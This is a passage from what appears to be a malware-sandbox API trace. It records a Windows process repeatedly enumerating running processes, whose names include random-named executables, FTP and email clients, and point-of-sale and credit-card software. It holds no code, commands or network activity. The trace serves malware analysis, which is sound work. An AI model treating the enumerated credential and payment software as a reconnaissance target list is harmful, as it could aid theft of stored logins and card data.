returned 1 [0304.532] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0304.534] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0304.535] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0304.537] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0304.539] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0304.540] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0304.542] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0304.544] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0304.545] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0304.547] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0304.548] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0304.550] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0304.552] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0304.553] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0304.555] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0304.557] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0304.584] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0304.586] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0304.587] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0304.589] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0304.591] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0304.592] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0304.594] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0304.595] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0304.597] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0304.599] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0304.601] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0304.603] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0304.605] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0304.607] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0304.609] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0304.611] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0304.612] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0304.614] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0304.616] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0304.655] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0304.657] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0304.659] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0304.661] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0304.663] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0304.664] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0304.666] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0304.668] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0304.670] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0304.672] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0304.674] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0304.675] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0304.677] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0304.678] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0304.680] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0304.682] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0304.684] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0304.685] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0304.712] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0304.722] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0304.735] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0304.736] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0304.738] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0304.740] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0304.741] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0304.743] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0304.747] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0304.749] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0304.750] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0304.752] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.753] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.755] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0304.756] Process32Next (in: hSnapshot=0x1d4c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0304.758] CloseHandle (hObject=0x1d4c) returned 1 [0304.758] Sleep (dwMilliseconds=0x64) [0304.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1040 [0304.956] Process32First (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.958] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.960] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.962] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.968] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.971] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.974] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.976] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.978] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.983] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.985] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.987] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.988] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.990] Process32Next (in: hSnapshot=0x1040, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) 